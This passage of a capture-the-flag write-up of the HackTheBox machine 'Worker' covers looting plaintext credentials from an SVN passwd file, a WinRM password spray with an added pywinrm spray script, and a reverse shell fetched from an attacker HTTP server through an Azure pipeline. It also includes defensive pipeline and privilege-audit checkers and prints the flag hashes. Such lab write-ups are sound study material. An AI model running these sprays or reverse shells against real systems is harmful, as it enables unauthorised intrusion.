    │       post-revprop-change.tmpl
    │       post-unlock.tmpl
    │       pre-commit.tmpl
    │       pre-lock.tmpl
    │       pre-revprop-change.tmpl
    │       pre-unlock.tmpl
    │       start-commit.tmpl
    │
    └───locks
            db-logs.lock
            db.lock
That passwd file in W:\svnrepos\www\conf\ looked interesting

Finding user creds

PS W:\svnrepos\www\conf> cat passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
In the folder W:\svnrepos\www\conf there was a file passwd that contained a list of usernames and passwords. This looked like a good time to brute force WinRM

Port 5985 - WinRM

I used winrm-brute to cycle through the list of usernames and passwords.
[SUCCESS] user: robisl password: wolves11
This retrieved the password for one of the users, robisl.
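The passwd file is small enough to spray blindly, but two details matter: it contains duplicate keys (nichin appears twice with different passwords, which a stock INI parser would silently drop or reject), and the net user and C:\Users listings from earlier say which names actually exist on the host and which have logged on interactively. The script below is an added example for this writeup, not the author's tooling or winrm-brute: it parses the svnserve passwd file keeping every pair, ranks the pairs by whether the user has a profile directory or at least a local account, and sprays them over WinRM with pywinrm, capping attempts per user. The inputs embedded in it are constructed excerpts of the page's own output; the pywinrm call is only reached when a host is given.

```python
"""Turn a leaked svnserve passwd file into an ordered WinRM password spray.
Added example for this writeup, not tooling from the original; the sample
inputs are constructed from excerpts of the page's own output."""
import sys


def parse_svn_passwd(text):
    """All (user, password) pairs in the [users] section, duplicates kept in order.
    configparser would reject the repeated 'nichin' key, so parse by hand."""
    pairs, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "users" and "=" in line:
            user, _, password = line.partition("=")
            pairs.append((user.strip(), password.strip()))
    return pairs


def parse_net_user(text):
    """Account names from `net user` output (everything between the dashes and the footer)."""
    users, in_list = set(), False
    for line in text.splitlines():
        if line.startswith("----"):
            in_list = True
            continue
        if line.startswith("The command completed"):
            break
        if in_list:
            users.update(line.split())
    return users


def prioritise(pairs, local_users, profiles):
    """Spray order: accounts with a C:\\Users profile first (they have logged on
    interactively), then other local accounts, then names unknown to the host."""
    lowered = {u.lower() for u in local_users}
    homed = {p.lower() for p in profiles}

    def rank(pair):
        user = pair[0].lower()
        return 0 if user in homed else 1 if user in lowered else 2

    return sorted(pairs, key=rank)   # sort is stable, so file order survives within a rank


def winrm_login(host, user, password):
    """True when the credential opens a WinRM session (needs `pip install pywinrm`).
    Imported lazily so the parsing above runs without the dependency."""
    import winrm
    try:
        session = winrm.Session(f"http://{host}:5985/wsman", auth=(user, password), transport="ntlm")
        return session.run_cmd("whoami").status_code == 0
    except Exception:
        return False


def spray(host, ordered_pairs, max_per_user=2):
    """Stop at the first success; cap attempts per user to stay under typical lockout
    thresholds (check `net accounts` on the box for the real policy before spraying)."""
    tried = {}
    for user, password in ordered_pairs:
        if tried.get(user, 0) >= max_per_user:
            continue
        tried[user] = tried.get(user, 0) + 1
        if winrm_login(host, user, password):
            return user, password
    return None


# constructed excerpts of the passwd file, `net user` and `ls \users` output shown above
SAMPLE_PASSWD = """\
### This file is an example password file for svnserve.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
robisl = wolves11
sarkil = friday
"""
SAMPLE_NET_USER = """\
User accounts for \\\\

-------------------------------------------------------------------------------
aaralf                   abrall                   Administrator
nathen                   nichin                   restorer
robisl                   sarkil                   WDAGUtilityAccount
The command completed with one or more errors.
"""
SAMPLE_PROFILES = ["Administrator", "Public", "restorer", "robisl"]

if __name__ == "__main__":
    ordered = prioritise(parse_svn_passwd(SAMPLE_PASSWD), parse_net_user(SAMPLE_NET_USER), SAMPLE_PROFILES)
    if len(sys.argv) == 2:
        print(spray(sys.argv[1], ordered))        # e.g. 10.10.10.203
    else:
        for pair in ordered:
            print(pair)
```

With no argument it only prints the spray order (robisl first, since that account has a profile directory); with a host it sprays. The per-user cap is deliberately low because a full list like this one, run unthrottled, is exactly what trips an account-lockout policy on a real engagement.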
┌──(zweilos㉿kali)-[~/htb/worker/winrm-brute]
└─$ evil-winrm -u robisl -p wolves11 -i 10.10.10.203
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robisl\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
worker\robisl S-1-5-21-3082756831-2119193761-3468718151-1330
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
WORKER\Production Alias S-1-5-21-3082756831-2119193761-3468718151-1018 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Using evil-winrm I was able to login with the password specified for robisl

User.txt

*Evil-WinRM* PS C:\Users\robisl\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls
Directory: C:\Users\robisl\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/12/2020 10:16 PM 34 user.txt
*Evil-WinRM* PS C:\Users\robisl\Desktop> cat user.txt
6266c82c4a400539708519fd31eb2a34
On the user's desktop I found the user.txt flag

Path to Power (Gaining Administrator Access)

Enumeration as robisl

After searching high and low and enumerating as much as I could, I didn't find anything useful.
I tried to switch users to robisl in the devops portal I already had open, but received an error message saying that this user did not have the permissions needed to view project-level information.
I decided to try robisl's credentials in a fresh devops session after closing the page and clearing my cache, and was happy to see that I was logged in to a different project.
Azure Pipelines provides a quick, easy, and safe way to automate building your projects and making them available to users.
This sounds like a good way to try to get code execution...I wonder if there is a way to run it in the context of Administrator? I put some code in the azure-pipelines.yml that I hoped would execute and download my reverse shell script.
Unfortunately this did not work. After doing even more reading, I found that I had to assign an agent from the pool to build the project.
Agent pool selection
Assign the job to the agent
Save and run
The build job was started
The job built successfully, but my script failed to run. I checked my syntax on everything, made sure I had done all of the proper steps, and tried again.
Unfortunately I don't remember exactly what I had done wrong, or how I fixed it (I need to take more detailed notes, I guess!). However, after a lot of trial and error, I was able to get the project to build and also execute my script. Now I hoped that it would actually execute the PowerShell script and send me a reverse shell!
New Pipeline - Azure Repos Git - PartsUnlimited - Starter Pipeline
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ python3 -m http.server 8909
Serving HTTP on 0.0.0.0 port 8909 (http://0.0.0.0:8909/) ...
10.10.10.203 - - [12/Dec/2020 20:32:32] "GET /revShell.ps1 HTTP/1.1" 200 -
My waiting python HTTP server got a connection request, and I could see that it sent the script.
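The point the pipeline build above makes is that an inline step runs whatever it says, on the agent, as the agent's identity, so anyone who can edit azure-pipelines.yml in a project gets code execution on the build host. As an added example that is not code from the writeup, here is a small stdlib-only Python review check that flags inline script steps which pair a download with execution of what was downloaded; the sample pipeline and the EXTERNAL_HOST placeholder are constructed.

```python
# Added example, not code from the writeup: a stdlib-only, line-based scanner
# for azure-pipelines.yml that flags inline script steps (script, powershell,
# pwsh, bash) which download content and execute it. A review aid, not a parser.
import re

STEP_RE = re.compile(r"^(\s*)-?\s*(script|powershell|pwsh|bash):\s*(.*)$")
RISKY = {  # a download plus execution of what was downloaded is the combination to flag
    "remote_fetch": re.compile(r"Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadString|DownloadFile", re.I),
    "exec": re.compile(r"\bIEX\b|Invoke-Expression|-EncodedCommand|\.\\\S+\.ps1|&\s*\S+\.ps1", re.I),
}

def iter_script_bodies(yaml_text):
    """Yield (1-based line of the step key, script text) for each inline step."""
    lines, i = yaml_text.splitlines(), 0
    while i < len(lines):
        m = STEP_RE.match(lines[i])
        i += 1
        if not m:
            continue
        key_indent, step_line, rest = len(m.group(1)), i, m.group(3).strip()
        if rest.rstrip("-+") not in ("|", ">"):   # plain scalar: a one-line script
            yield step_line, rest
            continue
        body, body_indent = [], None              # block scalar: lines indented deeper than the key
        while i < len(lines):
            cur = lines[i]
            if cur.strip():
                ind = len(cur) - len(cur.lstrip())
                body_indent = ind if body_indent is None else body_indent
                if ind <= key_indent or ind < body_indent:
                    break
                body.append(cur.strip())
            i += 1
        yield step_line, "\n".join(body)

def find_risky_steps(yaml_text):
    """Return [(step_line, [category, ...])] for steps matching a RISKY pattern."""
    found = [(n, [k for k, rx in RISKY.items() if rx.search(b)]) for n, b in iter_script_bodies(yaml_text)]
    return [(n, hits) for n, hits in found if hits]

# Constructed sample: one benign step and one that fetches a script from an
# outside host and runs it, the shape of the build the writeup describes.
SAMPLE_PIPELINE = """\
steps:
- script: echo Hello, world!
- powershell: |
    Invoke-WebRequest -Uri http://EXTERNAL_HOST:8909/revShell.ps1 -OutFile revShell.ps1
    .\\revShell.ps1
  displayName: 'Fetch and run'
"""
```

Run `find_risky_steps(SAMPLE_PIPELINE)` and only the powershell step (line 3) is reported, with both categories hit; a pipeline policy or pre-merge hook that requires a second reviewer on such steps is where this check belongs.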

Getting a shell

┌──(zweilos㉿kali)-[~/htb/worker]
└─$ nc -lvnp 8099
listening on [any] 8099 ...
connect to [10.10.15.98] from (UNKNOWN) [10.10.10.203] 51544
PS W:\agents\agent11\_work\8\s> whoami /all
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================== ==================================================
Mandatory Label\System Mandatory Level Label S-1-16-16384
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_G5f35d Alias S-1-5-21-3082756831-2119193761-3468718151-1419 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_G81207 Alias S-1-5-21-3082756831-2119193761-3468718151-1415 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_G8be50 Alias S-1-5-21-3082756831-2119193761-3468718151-1416 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_G8f9d6 Alias S-1-5-21-3082756831-2119193761-3468718151-1418 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_G93a88 Alias S-1-5-21-3082756831-2119193761-3468718151-1420 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_Gb286d Alias S-1-5-21-3082756831-2119193761-3468718151-1414 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_Gb4ad8 Alias S-1-5-21-3082756831-2119193761-3468718151-1413 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_Ge7dab Alias S-1-5-21-3082756831-2119193761-3468718151-1412 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_Ged5e3 Alias S-1-5-21-3082756831-2119193761-3468718151-1417 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS W:\agents\agent11\_work\8\s>
I was happy to see that my script worked, and I got a reverse shell as NT Authority/System!
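The whoami /all output above is the finding a defender should take away: the agent service runs jobs as NT AUTHORITY\SYSTEM, a member of BUILTIN\Administrators, with SeDebugPrivilege, SeTcbPrivilege and SeImpersonatePrivilege enabled, so the right to edit a pipeline is equivalent to administrator on the build host. As an added example that is not code from the writeup, the Python check below parses captured whoami /all text and reports exactly that, so the same audit can be run against any agent; the excerpt is constructed from the output above with the column padding shortened.

```python
# Added example, not code from the writeup: parse captured `whoami /all` text
# from a build agent and report whether the identity running pipeline jobs
# hands every pipeline author administrator control of the host.
import re

SID_RE = re.compile(r"\bS-1-[0-9-]+\b")
PRIV_RE = re.compile(r"^\s*(Se\w+Privilege)\b.*\b(Enabled|Disabled)\s*$", re.M)
SYSTEM_SID, ADMINS_SID = "S-1-5-18", "S-1-5-32-544"
HIGH_IMPACT = {"SeDebugPrivilege", "SeTcbPrivilege", "SeImpersonatePrivilege",
               "SeAssignPrimaryTokenPrivilege", "SeLoadDriverPrivilege",
               "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege"}

def assess_agent_identity(whoami_text):
    """Summarise the token `whoami /all` printed: user SID, SYSTEM/admin flags and
    enabled high-impact privileges. Sections are split on the USER/GROUP/PRIVILEGES
    headers so SIDs from the user table and the group table are not mixed."""
    parts = re.split(r"\n(?=(?:USER|GROUP|PRIVILEGES) INFORMATION)", whoami_text)
    section = {p.split()[0].lower(): p for p in parts if p.strip()}
    user_sids = SID_RE.findall(section.get("user", ""))
    group_sids = set(SID_RE.findall(section.get("group", "")))
    enabled = {n for n, s in PRIV_RE.findall(section.get("privileges", "")) if s == "Enabled"}
    return {"user_sid": user_sids[0] if user_sids else None,
            "is_system": SYSTEM_SID in user_sids,
            "is_admin": ADMINS_SID in group_sids,
            "high_impact_enabled": sorted(enabled & HIGH_IMPACT)}

# Constructed excerpt of the output above (column padding shortened).
SAMPLE_WHOAMI = """\
USER INFORMATION
----------------
User Name            SID
==================== ========
nt authority\\system  S-1-5-18

GROUP INFORMATION
-----------------
Group Name              Type   SID           Attributes
BUILTIN\\Users           Alias  S-1-5-32-545  Mandatory group, Enabled by default, Enabled group
BUILTIN\\Administrators  Alias  S-1-5-32-544  Enabled by default, Enabled group, Group owner

PRIVILEGES INFORMATION
----------------------
Privilege Name          Description                                 State
SeTcbPrivilege          Act as part of the operating system         Enabled
SeDebugPrivilege        Debug programs                              Enabled
SeBackupPrivilege       Back up files and directories               Disabled
SeImpersonatePrivilege  Impersonate a client after authentication   Enabled
"""
```

An agent registered under a dedicated low-privilege service account returns is_system and is_admin False and an empty high-impact list, which is the state to aim for when a pool is shared with users who only need to run builds.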

Root.txt

┌──(zweilos㉿kali)-[~/htb/worker]
└─$ nc -lvnp 8099
listening on [any] 8099 ...
connect to [10.10.15.98] from (UNKNOWN) [10.10.10.203] 51686
type C:\Administrator\Desktop\root.txt
PS W:\agents\agent11\_work\10\s> cd C:\
PS C:\> cd \users\Administrator\Desktop
PS C:\users\Administrator\Desktop> type root.txt
8af884b2e94242799a6b6dbb19eb9add
I unfortunately had to recreate my session as some automated process deleted it after a short time, but after so much effort I was able to retrieve my proof!
Thanks to ekenas for... [something interesting or useful about this machine.]
If you like this content and would like to see more, please consider buying me a coffee!